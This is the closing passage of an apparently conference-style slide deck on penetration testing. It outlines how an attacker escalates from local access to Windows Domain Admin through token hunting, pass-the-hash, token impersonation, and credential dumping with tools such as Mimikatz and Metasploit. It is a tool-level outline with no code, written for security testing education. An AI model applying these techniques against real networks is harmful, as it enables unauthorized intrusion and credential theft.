- SQL Server and database links + xp_cmdshell
WINDOWS ESCALATION: FIND DA TOKENS
• Locate Domain Admin tokens
- Check locally ;)
  • incognito
- Query the domain controllers
  • netsess.exe
- Scan remote systems for running tasks
  • native tasklist or smbexec
- Scan old Windows systems for NetBIOS
- Shell spraying for tokens (not advised)
WINDOWS ESCALATION: DOMAIN ADMIN
• LocalSystem → Domain Admin
- Pass-the-hash to the target system
  • Local administrator account and shared service accounts
  • Manually via trusted connections or via MSF, etc.
- Impersonate authentication token
  • Custom application, Incognito, WCE, Metasploit
- Dump cleartext domain credentials
  • Mimikatz, WCE, or Metasploit
- Key logging
- MITM + sniffing (HTTP integrated auth, etc.)
CONCLUSIONS
All can kind of be fixed
• Most Networks: kind of broken
• Most Protocols: kind of broken
• Most Applications: kind of broken
ATTACK ALL THE LAYERS!
ANY QUESTIONS?
Scott Sutherland Principal Security Consultant Twitter: @_nullbind
Karl Fosaaen Security Consultant Twitter: @kfosaaen